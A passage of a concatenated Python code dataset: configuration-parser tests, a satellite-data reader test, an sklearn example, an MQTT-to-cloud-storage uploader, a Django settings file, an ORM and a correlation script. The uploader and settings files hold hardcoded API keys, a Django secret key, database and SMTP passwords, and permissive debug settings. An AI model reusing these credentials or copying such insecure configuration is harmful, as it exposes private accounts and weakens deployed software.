100}},\n}\n\n\ndef test_get_data_errors_edge_cases():\n assert get_data_errors({}, []) == []\n assert get_data_errors({}, field_types) == []\n\n\ndef test_get_data_errors_unknown_keys():\n assert get_data_errors({'a': 'b'}, []) == ['Unknown key name: \"a\"']\n assert get_data_errors({'x': 1}, field_types) == ['Unknown key name: \"x\"']\n\n\ndef test_get_data_errors_simple():\n assert get_data_errors({'a': 'foobar'}, [('a', int)]) == [\n 'Field \"a\" should be int']\n assert get_data_errors({'a': 'foobar'}, [('a', {text: text})]) == [\n 'Field \"a\" should be dict']\n assert get_data_errors({'a': {'foobar': 2}}, [('a', {text: text})]) == [\n 'Values of \"a\" should be ' + text.__name__]\n assert get_data_errors({'a': {2: 'foobar'}}, [('a', {text: text})]) == [\n 'Keys of \"a\" should be ' + text.__name__]\n\n\ndef test_get_data_errors_sub_dict():\n assert get_data_errors({'a': 1}, field_types) == [\n 'Field \"a\" should be dict']\n assert get_data_errors({'a': {'b': 1}}, field_types) == [\n 'Field \"a.b\" should be dict']\n\n\ndef test_get_data_errors_with_unknown_subkey():\n assert get_data_errors({'sub': {'unknown': 42}}, field_types) == [\n 'Unknown key name: \"sub.unknown\"']\n\n\ndef test_get_data_errors_with_known_subkey():\n assert get_data_errors({'sub': {'int_item': 42}}, field_types) == []\n assert get_data_errors({'sub': {'text_item': ''}}, field_types) == []\n\n\ndef test_get_data_errors_with_ok_data():\n assert get_data_errors(ok_data, field_types) == []\n\n\ndef test_get_data_errors_with_int_error():\n not_ok = dict(ok_data, int_item='hello')\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"int_item\" should be int']\n\n\ndef test_get_data_errors_with_list_error():\n not_ok = dict(ok_data, list_item_int_value=42)\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"list_item_int_value\" should be list']\n\n\ndef test_get_data_errors_with_list_item_error():\n not_ok = dict(ok_data, list_item_int_value=['not int'])\n assert get_data_errors(not_ok, field_types) == [\n 'Values of \"list_item_int_value\" should be int']\n\n\ndef test_get_data_errors_with_dict_error():\n not_ok = dict(ok_data, dict_item='hello')\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"dict_item\" should be dict']\n\n\ndef test_get_data_errors_with_sub_text_error():\n not_ok = dict(ok_data, sub={'text_item': 42})\n assert get_data_errors(not_ok, field_types) == [\n 'Field \"sub.text_item\" should be ' + text.__name__]\n\n\ndef test_get_data_errors_invalid_type_specifier():\n with pytest.raises(ValueError):\n get_data_errors({'x': 1}, [('x', set('abc'))])\n\n\ndef test_from_dict_with_errors():\n conf_data = {'unknown_key': 'value'}\n with pytest.raises(InvalidPrequConfiguration) as excinfo:\n PrequConfiguration.from_dict(conf_data)\n assert '{}'.format(excinfo.value) == (\n 'Errors in Prequ configuration: Unknown key name: \"unknown_key\"')\n\n\ndef test_unknown_wheel_source():\n conf_data = {\n 'requirements': {'base': 'foobar==1.2 (wheel from baz)'}\n }\n conf = PrequConfiguration.from_dict(conf_data)\n with pytest.raises(UnknownWheelSource) as excinfo:\n list(conf.get_wheels_to_build())\n assert '{}'.format(excinfo.value) == (\n 'No URL template defined for \"baz\"')\n\n\n@pytest.mark.parametrize('enabled', [\n '', 'annotate', 'generate_hashes', 'header',\n 'index_url', 'extra_index_urls',\n 'trusted_hosts', 'find_links'])\ndef test_get_prequ_compile_options(enabled):\n conf_data = {'requirements': {'base': ''}, 'options': {}}\n expected_opts = {\n 'annotate': False,\n 'generate_hashes': False,\n 'header': True,\n }\n if enabled == 'index_url':\n conf_data['options'][enabled] = 'http://example.com'\n expected_opts[enabled] = 'http://example.com'\n elif enabled == 'extra_index_urls':\n conf_data['options'][enabled] = ['http://example.com']\n expected_opts['extra_index_url'] = ['http://example.com']\n elif enabled == 'trusted_hosts':\n conf_data['options'][enabled] = ['machine']\n expected_opts['trusted_host'] = ['machine']\n elif enabled == 'find_links':\n conf_data['options']['wheel_dir'] = 'some_dir'\n expected_opts[enabled] = ['some_dir']\n elif enabled:\n conf_data['options'][enabled] = True\n expected_opts[enabled] = True\n conf = PrequConfiguration.from_dict(conf_data)\n opts = conf.get_prequ_compile_options()\n assert opts == expected_opts\n\n\ndef test_label_sorting():\n data = {'requirements': {'a': '', 'base': '', 'b': '', 'c': ''}}\n conf = PrequConfiguration.from_dict(data)\n assert conf.labels == ['base', 'a', 'b', 'c']\n\n\ndef test_requirements_in_generation():\n data = {\n 'requirements': {\n 'base': 'framework',\n 'dev': 'ipython',\n 'test': 'pytest',\n }\n }\n conf = PrequConfiguration.from_dict(data)\n assert conf.get_requirements_in_for('base') == 'framework'\n assert conf.get_requirements_in_for('dev') == (\n '-c requirements.txt\\n'\n 'ipython')\n assert conf.get_requirements_in_for('test') == (\n '-c requirements.txt\\n'\n 'pytest')\n\n\ndef test_from_dir():\n with in_temporary_directory():\n create_configuration(\n requirements={\n 'base': ['foobar'],\n 'requirements-local.in': ['ipython'],\n })\n conf = PrequConfiguration.from_directory('.')\n assert conf.requirement_sets['base'] == '\\nfoobar'\n assert conf.requirement_sets['local'] == 'ipython'\n\n\ndef test_from_dir_without_conf():\n with in_temporary_directory():\n with pytest.raises(NoPrequConfigurationFound):\n PrequConfiguration.from_directory('.')\n\n\ndef test_from_in_files():\n conf = {\n 'no_setup_cfg': True,\n 'requirements': {'requirements.in': ['foobar']},\n }\n with in_temporary_directory():\n create_configuration(**conf)\n conf = PrequConfiguration.from_in_files('requirements.in')\n assert conf.requirement_sets['base'] == 'foobar'\n\n\ndef test_from_in_files_invalid_filename():\n conf = {\n 'no_setup_cfg': True,\n 'requirements': {'requirements_foo.in': ['foobar']},\n }\n with in_temporary_directory():\n create_configuration(**conf)\n with pytest.raises(InvalidPrequConfiguration) as excinfo:\n PrequConfiguration.from_in_files('requirements_foo.in')\n assert '{}'.format(excinfo.value) == (\n 'Invalid in-file name: requirements_foo.in')\n\n\nconf_ini_content = \"\"\"\n[prequ]\nannotate = True\nextra_index_urls =\n https://one.example.com/\n https://two.example.com/\nwheel_dir = wh€€ls\nwheel_sources =\n test_gh = git+ssh://git@github.com/test/{pkg}@{ver}\n\nrequirements =\n foobar\n somewheel==1.0.0 (wheel from test_gh)\n barfoo\n\nrequirements-dev =\n devpkg>=2\n\"\"\"\n\n\ndef test_configuration_parsing_ini():\n stream = io.StringIO(conf_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf.annotate is True\n assert conf.extra_index_urls == [\n 'https://one.example.com/', 'https://two.example.com/']\n assert conf.wheel_dir == 'wh€€ls'\n assert conf.wheel_sources == {\n 'test_gh': 'git+ssh://git@github.com/test/{pkg}@{ver}'}\n assert sorted(conf.requirement_sets.keys()) == ['base', 'dev']\n assert conf.requirement_sets['base'] == (\n '\\n'\n 'foobar\\n'\n 'somewheel==1.0.0\\n'\n 'barfoo')\n assert conf.requirement_sets['dev'] == '\\ndevpkg>=2'\n assert conf.wheels_to_build == [('test_gh', 'somewheel', '1.0.0')]\n assert list(conf.get_wheels_to_build()) == [\n ('somewheel', '1.0.0',\n 'git+ssh://git@github.com/test/somewheel@1.0.0')]\n pass\n\n\ndef test_configuration_parsing_ini_no_section():\n other_ini_content = (\n '[other_section]\\n'\n 'something = else\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf is None\n\n\ndef test_configuration_parsing_ini_simple():\n other_ini_content = (\n '[prequ]\\n'\n 'requirements = flask\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert isinstance(conf, PrequConfiguration)\n assert conf.requirement_sets['base'] == 'flask'\n\n\ndef test_configuration_parsing_ini_without_base():\n other_ini_content = (\n '[prequ]\\n'\n 'requirements-test = pytest\\n')\n stream = io.StringIO(other_ini_content)\n conf = PrequConfiguration.from_ini(stream)\n assert conf.requirement_sets['test'] == 'pytest'\n assert 'base' not in conf.requirement_sets\n","sub_path":"tests/test_configuration.py","file_name":"test_configuration.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287436582","text":"# Copyright (c) 2017, Vienna University of Technology (TU Wien),\n# Department of Geodesy and Geoinformation (GEO).\n# All rights reserved.\n#\n# All information contained herein is, and remains the property of Vienna\n# University of Technology (TU Wien), Department of Geodesy and Geoinformation\n# (GEO). The intellectual and technical concepts contained herein are\n# proprietary to Vienna University of Technology (TU Wien), Department of\n# Geodesy and Geoinformation (GEO). Dissemination of this information or\n# reproduction of this material is forbidden unless prior written permission\n# is obtained from Vienna University of Technology (TU Wien), Department of\n# Geodesy and Geoinformation (GEO).\n\n'''\nTests for reading CGLOPS SWI data.\n'''\n\nfrom ascat.cgls import SWI_TS\nimport os\nimport pandas as pd\nimport numpy as np\n\n\ndef test_swi_ts_reader():\n\n data_path = os.path.join(\n os.path.dirname(__file__), 'test-data', 'sat', 'cglops', 'swi_ts')\n rd = SWI_TS(data_path)\n data = rd.read_ts(3002621, mask_frozen=False)\n data_sorted = data.sort_index()\n assert np.all(data_sorted.index == data.index)\n # just check if enough data is there\n reference_index = pd.date_range('20070101T12:00:00', '20161231T12:00:00')\n assert len(data) == len(reference_index)\n assert np.all(data_sorted.index == reference_index)\n\n lon, lat = rd.grid.gpi2lonlat(3002621)\n data = rd.read_ts(lon, lat, mask_frozen=False)\n data_sorted = data.sort_index()\n assert np.all(data_sorted.index == data.index)\n # just check if enough data is there\n reference_index = pd.date_range('20070101T12:00:00', '20161231T12:00:00')\n assert len(data) == len(reference_index)\n assert np.all(data_sorted.index == reference_index)\n\n\ndef test_swi_ts_qflag_reading():\n data_path = os.path.join(\n os.path.dirname(__file__), 'test-data', 'sat', 'cglops', 'swi_ts')\n rd = SWI_TS(data_path, parameters=['SWI_001', 'QFLAG_001', 'SSF'])\n data = rd.read_ts(3002621, mask_frozen=True)\n # check if QFLAG is correctly read. It should have as many NaN values as\n # SWI\n assert len(data[data.loc[:, 'QFLAG_001'] != np.nan]) > 0\n assert (len(data[data.loc[:, 'QFLAG_001'] == np.nan]) ==\n len(data[data.loc[:, 'SWI_001'] == np.nan]))\n\nif __name__ == \"__main__\":\n test_swi_ts_reader()\n","sub_path":"tests/test_cgls.py","file_name":"test_cgls.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442538004","text":"#!python\n# -*- coding: utf-8 -*-#\n\"\"\"\nMulti-class Perceptron sklearn\n\n@author: Bhishan Poudel\n\n@date: Nov 14, 2017\nhttps://www.springboard.com/blog/beginners-guide-neural-network-in-python-scikit-learn-0-18/\n\n\"\"\"\n# Imports\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import classification_report,confusion_matrix\n\nimport pandas as pd\n\ndef mlp_sklearn():\n\n names = [\"Cultivator\", \"Alchol\", \"Malic_Acid\", \"Ash\", \"Alcalinity_of_Ash\", \"Magnesium\", \"Total_phenols\", \"Falvanoids\", \"Nonflavanoid_phenols\", \"Proanthocyanins\", \"Color_intensity\", \"Hue\", \"OD280\", \"Proline\"]\n\n wine = pd.read_csv('wine_data.txt', names=names)\n # print(\"wine.head() = {}\".format(wine.head()))\n\n a = wine.describe().transpose()\n # print(a)\n\n # print(\"wine.shape = {}\".format(wine.shape)) # (178, 14)\n\n X = wine.drop('Cultivator',axis=1)\n y = wine['Cultivator']\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n scaler = StandardScaler()\n\n # Fit only to the training data\n scaler.fit(X_train)\n\n StandardScaler(copy=True, with_mean=True, with_std=True)\n\n # Now apply the transformations to the data:\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # test\n mlp = MLPClassifier(hidden_layer_sizes=(13,13,13), max_iter=500,random_state=100)\n mlp.fit(X_train,y_train)\n predictions = mlp.predict(X_test)\n\n\n # print(confusion_matrix(y_test,predictions))\n # print(classification_report(y_test,predictions))\n\n # coefs and weights\n print(\"len(mlp.coefs_) = {}\".format(len(mlp.coefs_)))\n print(\"len(mlp.coefs_[0]) = {}\".format(len(mlp.coefs_[0])))\n print(\"len(mlp.intercepts_[0]) = {}\".format(len(mlp.intercepts_[0])))\n\ndef main():\n \"\"\"Run main function.\"\"\"\n mlp_sklearn()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Homeworks/hw06/prac/perceptron_eg/multilayer_perc_skn/mlp_sklearn.py","file_name":"mlp_sklearn.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364620049","text":"#!/usr/bin/env python2\n\nimport paho.mqtt.client as mqtt\nimport numpy as np\n# import scipy.misc as misc\nimport json\nimport time\nimport sys\nimport traceback\n# import png\n# from PIL import Image\nfrom datetime import datetime\n\nimport ibm_boto3\nfrom ibm_botocore.client import Config, ClientError\n\nCLOUD_MQTT_HOST=\"cloudbroker\"\nCLOUD_MQTT_PORT=1883\nCLOUD_MQTT_TOPIC=\"/facedetect/cloud/faces\"\n\nCOS_BUCKET_NAME=\"byrnej-object-storage-wk3\"\nCOS_ENDPOINT= \"https://s3.private.us-east.cloud-object-storage.appdomain.cloud\"\n\n\n#### IBM CLOUD OBJECT STORAGE CREDENTIALS\ncred = {\n \"apikey\": \"rqhlDqUlhZaIUoxNoqbezz2384MRydk-h0he1wkUzIiM\",\n \"endpoints\": \"https://control.cloud-object-storage.cloud.ibm.com/v2/endpoints\",\n \"iam_apikey_description\": \"Auto-generated for key a0578150-577f-4895-9a2b-3a66d8038bfb\",\n \"iam_apikey_name\": \"byrnej-object-storage-wk7\",\n \"iam_role_crn\": \"crn:v1:bluemix:public:iam::::serviceRole:Writer\",\n \"iam_serviceid_crn\": \"crn:v1:bluemix:public:iam-identity::a/eda6b7edc8514da3814170714bcfa440::serviceid:ServiceId-f76673fa-73ac-4342-b7bd-f4c088e8791b\",\n \"resource_instance_id\": \"crn:v1:bluemix:public:cloud-object-storage:global:a/eda6b7edc8514da3814170714bcfa440:d4248333-b19f-4e17-9662-66a57ce4df55::\"\n}\n\n\n##### Create resource for COS:\ncos = ibm_boto3.resource(\"s3\",\n ibm_api_key_id=cred[\"apikey\"],\n ibm_service_instance_id=cred[\"resource_instance_id\"],\n ibm_auth_endpoint=\"https://iam.bluemix.net/oidc/token\",\n config=Config(signature_version=\"oauth\"),\n endpoint_url=COS_ENDPOINT\n)\n\n##### Test commands for successful connection to COS\nprint(\"trying to list buckets\")\nfor bucket in cos.buckets.all():\n print(\"Bucket Name: {0}\".format(bucket.name))\nprint(\"trying to list contents\")\nfiles = cos.Bucket(COS_BUCKET_NAME).objects.all()\nfor file in files:\n print(f\"Item: {file.key} ({file.size} bytes).\")\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to cloud mqtt broker with result code \"+str(rc))\n print(\"Subscribing...\")\n client.subscribe(CLOUD_MQTT_TOPIC)\n print(\"Completed subscription to \" + CLOUD_MQTT_TOPIC)\n\n\n# allows us to get information about errors inside callbacks\ndef on_log(client, userdata, level, buf):\n # print(\"on_log:\",level,buf)\n if (level == MQTT_LOG_WARNING):\n print(\"MQTT_WARNING:\",buf)\n elif (level == MQTT_LOG_ERR):\n print(\"MQTT_ERROR:\",buf)\n print(\"Exiting.\")\n exit(-1)\n\n# Error in callbacks are not printed, nor exceptions thrown\n# outside the mqtt. Uses on_log to print out the results\ndef on_message(client, userdata, msg):\n try:\n print(\"Received a message, payload: \" + str(msg.payload)[:30] + \"...\")\n\n # create save filename based on time of message\n now = datetime.now()\n file_name = now.strftime(\"%y%m%d-%H%M%S.%f\") + \".json\"\n\n # convert back to array from json formatted string\n m_decode=str(msg.payload.decode(\"utf-8\",\"ignore\"))\n data = json.loads(m_decode)\n print(data[0])\n\n print(f\"Adding json text as '{file_name}' to COS\")\n cos.Object(COS_BUCKET_NAME, file_name).put(Body=m_decode)\n\n except:\n traceback.print_exc()\n quit(0)\n\nprint(\"Setting up Client object\")\nclient = mqtt.Client(client_id=\"imgproc\")\n\nprint(\"Adding Callbacks\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_log = on_log\n\n# set up connection to MQTT broker on the cloud VSI\nprint(\"Connecting to cloud broker\")\nclient.connect(CLOUD_MQTT_HOST, CLOUD_MQTT_PORT)\n\nprint(\"Starting loop...\")\n\nwhile True:\n client.loop(0.1)\n\n\n","sub_path":"wk7/ImageProcessor/py/imgproc.py","file_name":"imgproc.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639379326","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = 'mcvc1cs@fhf3shj&$1sp=l=nj^t2r1=1%55pe9x0eghfukm!9m'\nDEBUG = True\nALLOWED_HOSTS = ['*']\nINSTALLED_APPS = [\n 'accounts',\n \n 'modeltranslation',\n\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n\n 'channels',\n 'chatrooms',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n 'crispy_forms',\n\n 'allauth.socialaccount.providers.facebook',\n\n 'blog',\n 'bootstrap4', \n 'mptt',\n 'import_export',\n 'taggit',\n 'django_summernote',\n 'ckeditor',\n 'ckeditor_uploader',\n # 'tinymce',\n 'categories',\n # 'froala_editor',\n 'robots',\n # 'meta',\n 'boards',\n 'rosetta',\n\n]\nSITE_ID =1\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\nROOT_URLCONF = 'core.urls'\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.request',\n 'django.template.context_processors.i18n',\n 'django.contrib.messages.context_processors.messages',\n 'blog.views.category_list',\n 'accounts.views.avatar'\n ],\n },\n },\n]\n\nAUTHENTICATION_BACKENDS = [\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\n\nWSGI_APPLICATION = 'core.wsgi.application'\nASGI_APPLICATION = 'core.asgi.application'\n\nCHANNEL_LAYERS = {\n 'default': {\n 'BACKEND': 'channels_redis.core.RedisChannelLayer',\n 'CONFIG': {\n 'hosts': [('127.0.0.1', 6379)]\n }\n }\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'db06',\n 'USER': 'postgres', \n 'PASSWORD': 'a',\n 'HOST': 'localhost',\n 'PORT': '5432', #my port is 3306\n }\n}\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\nfrom django.utils.translation import ugettext_lazy as _\n\nLANGUAGE_CODE = 'ar'\n# LANGUAGES = [\n# ('ar', _('Arabic')),\n# ('en', _('English')),\n# ]\ngettext = lambda s: s\nLANGUAGES = (\n ('ar', gettext('Arabic')),\n ('en', gettext('English')),\n)\n\nLOCALE_PATHS = [\n os.path.join(BASE_DIR,'locale'),\n]\n\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n# Error code\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\nCKEDITOR_CONFIGS = {\n 'default': {\n 'toolbar': 'Custom',\n 'toolbar_Custom': [\n ['Bold', 'Italic', 'Underline'],\n ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock'],\n ['Link', 'Unlink'],\n ['RemoveFormat', 'Source']\n ],\n 'height': 300,\n 'width': 600,\n },\n}\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\t \nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"static\"),\t\t\t#<========\n]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nLOGIN_REDIRECT_URL = 'accounts:edit'\nLOGIN_URL = 'login'\nLOGOUT_URL = 'logout'\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n \nX_FRAME_OPTIONS = 'SAMEORIGIN'\n\nSUMMERNOTE_THEME = 'bs4' # Show summernote with Bootstrap4 \n\n\nSUMMERNOTE_CONFIG = {\n\n # Or, you can set it to `False` to use SummernoteInplaceWidget by default - no iframe mode\n # In this case, you have to load Bootstrap/jQuery sources and dependencies manually.\n # Use this when you're already using Bootstrap/jQuery based themes.\n 'iframe': False,\n\n # You can put custom Summernote settings\n 'summernote': {\n # As an example, using Summernote Air-mode\n 'airMode': False,\n\n # Change editor size\n 'width': '100%',\n 'height': '480',\n\n # Use proper language setting automatically (default)\n 'lang': None,\n\n # Toolbar customization\n # https://summernote.org/deep-dive/#custom-toolbar-popover\n 'toolbar': [\n ['style', ['style']],\n ['font', ['bold', 'underline', 'clear']],\n ['fontname', ['fontname']],\n ['color', ['color']],\n ['para', ['ul', 'ol', 'paragraph']],\n ['table', ['table']],\n ['insert', ['link', 'picture' ]],\n ['view', ['fullscreen', 'codeview', 'help']],\n ],\n\n # Or, explicitly set language/locale for editor\n 'lang': 'ar-AR',\n \n}\n}\nACCOUNT_EMAIL_VERIFICATION = 'none'\n\n\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USERNAME_REQUIRED = True\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = 'ahmedazadcxv@gmail.com'\n# EMAIL_HOST_PASSWORD = '+654+654'\n\n\nEMAIL_HOST = 'smtp.mailtrap.io'\nEMAIL_HOST_USER = '93e1f23e2fc176'\nEMAIL_HOST_PASSWORD = '456a4b33443a66'\nEMAIL_PORT = '2525'\n","sub_path":"core/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24132473","text":"import cv2\nimport numpy as np\n\nfrom gbvision.models.contours import FilterContours, find_contours, sort_polygons, contour_center, contours_to_polygons\nfrom gbvision.constants.system import EMPTY_PIPELINE\nfrom .object_finder import ObjectFinder\n\n\nclass PolygonFinder(ObjectFinder):\n \"\"\"\n finds any generic polygon, not recommended when another finder can be used\n \"\"\"\n\n def __init__(self, threshold_func, game_object, area_scalar=1.0, contour_min_area=0):\n \"\"\"\n\n :param area_scalar: optional, a scalar to multiply the area by, for fine tuning of the function's output\n :param contour_min_area: the minimal area of a contour, used for FilterContours, default is 0 (no area limit)\n \"\"\"\n ObjectFinder.__init__(self, threshold_func, game_object)\n self._full_pipeline = (EMPTY_PIPELINE +\n threshold_func +\n find_contours +\n FilterContours(min_area=contour_min_area) +\n contours_to_polygons +\n sort_polygons)\n self.area_scalar = area_scalar\n\n def __call__(self, frame, camera):\n contours = self._full_pipeline(frame)\n return list(map(\n lambda cnt: self.game_object.location_by_params(camera, self.area_scalar * np.sqrt(cv2.contourArea(cnt)),\n contour_center(cnt)), contours))\n","sub_path":"gbvision/finders/polygon_finder.py","file_name":"polygon_finder.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552455626","text":"import sqlite3\nfrom data.schema import DBPATH\n\nclass ORM:\n dbpath = DBPATH #<-- can be overwritten in inhereting class if desired. in this case is the same for all tables\n tablename = \"\" #<-- will be overwritten in inheriting classes\n fields = [] #<-- Column Headers in our tables | will be overwritten in inherting classes\n\n createsql = \"\"\" \"\"\" #<-- can be empty since account/position/trader will each have their own createsql (to create a table)\n\n def __init__(self, **kwargs):\n raise NotImplementedError\n\n def __repr__(self): #<-- what is printed when the print function is called on the class object (for debugging)\n template = \"<{} ORM: pk={}>\" \n return template.format(self.tablename, self.values['pk']) #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n \n def __getitem__(self, key):\n return self.values[key] #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n\n def __setitem__(self, key, value):\n self.values[key] = value #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n\n def save(self): \n \"\"\"if self.values['pk] exists, update row else\n insert row (class Account/Trade/Position)\"\"\"\n if self.values['pk']: #<-- red underline since ORM cant be instantiated, inhereting classes wont throw error\n self.update_row()\n else:\n self.insert_row()\n\n def insert_row(self):\n \"\"\"insert the values from this istance into the db as a row,\n then return cursor.lastrowid, \n \\ncursor.lastrowid is id of last selected row (in this case inserted row)\"\"\"\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor() #<-- curs allows to select in db\n fieldlist = \", \".join(self.fields) #<- .join returns a string of \"field, \" for each field in [fields]\n qmarks = \", \".join(['?' for _ in self.fields]) #<- .join returns a string of \"?, \" for each field in [fields] <- done to sanitize inputs\n SQL = \"\"\" INSERT INTO {} ({}) VALUES ({}); \"\"\".format( #<- SQL statement\n self.tablename, fieldlist, qmarks) #<- SQL statement continued\n values = [self.values[field] for field in self.fields]\n curs.execute(SQL, values) #<-- .execute() applies function to selected row (SQL statement is the SQL function), (values are our sanitized inputs in SQL statement)\n pk = curs.lastrowid #lastrowid --> read-only attribute provides the rowid of the last modified row. \n self.values['pk'] = pk # ^ It is only set if you issued a INSERT statement using the execute() method.\n\n\n def update_row(self):#<-- when we call this function, we have already changed the class (Account/Trade/Position).values[field] and want to save it to db\n \"\"\"update the row with this instance's pk value to the current\n values of this instance\"\"\"\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor()\n # join a list of \"column_name = ?\" pairs\n set_equals = \", \".join([\"{}=?\".format(field) for field in self.fields]) #<-- same as in insert_row but condensed\n SQL = \"\"\" UPDATE {} SET {} WHERE pk=?; \"\"\".format(self.tablename,set_equals)\n values = [self.values[field] for field in self.fields] + [self.values['pk']]\n curs.execute(SQL, values)\n\n def delete(self):\n if self.values['pk'] is None:\n raise KeyError(self.__repr__() + \" is not a row in \" +\n self.tablename)\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor()\n SQL = \"\"\"DELETE FROM {} WHERE pk = ?; \"\"\".format(self.tablename)\n curs.execute(SQL, (self.values['pk'],))\n\n @classmethod\n def create_table(cls):\n \"\"\"run the cls.createsql SQL command\"\"\"\n with sqlite3.connect(cls.dbpath) as conn:\n curs = conn.cursor()\n curs.execute(cls.createsql)\n\n @classmethod\n def one_from_where_clause(cls, where_clause=\"\", values=tuple()):\n SQL = \"SELECT * FROM {} {};\".format(cls.tablename, where_clause)\n with sqlite3.connect(cls.dbpath) as conn:\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(SQL, values)\n row = cur.fetchone()\n if not row:\n return None\n return cls(**row)\n\n @classmethod\n def all_from_where_clause(cls, where_clause=\"\", values=tuple()):\n SQL = \"SELECT * FROM {} {};\".format(cls.tablename, where_clause)\n with sqlite3.connect(cls.dbpath) as conn:\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(SQL, values)\n rows = cur.fetchall()\n return [cls(**row) for row in rows]\n\n @classmethod\n def one_from_pk(cls, pk):\n return cls.one_from_where_clause(\"WHERE pk=?\", (pk,))\n","sub_path":"TTrader/model/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415799279","text":"#!/usr/bin/python\n\nfrom math import log,sqrt\n\ndef mean(X):\n\treturn sum(X)*1.0/len(X)\n\ndef getCor( A, B ):\n\tmA, mB = mean(A), mean(B)\n\tup = sum([(a-mA)*(b-mB) for a,b in zip(A,B)])\n\tdn = sum([(a-mA)**2 for a in A]) * sum([(b-mB)**2 for b in B])\n\treturn 0 if dn == 0 else up / sqrt(dn)\n\nimport sys, numpy\n\nwith open(sys.argv[1],'r') as inp:\n\tdata = [map(float,row.strip().split()) for row in inp]\n\n\ncor = [getCor(data[i],data[j]) for i in xrange(len(data)) for j in xrange(i+1,len(data))]\n\nwith open(sys.argv[2],'w') as oup:\n\tF, P = numpy.histogram(cor, 100)\n\tfor f, p in zip(F,P):\n\t\tprint >> oup, str(p) + '\\t' + str(f)\n","sub_path":"other-method/cor.py","file_name":"cor.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 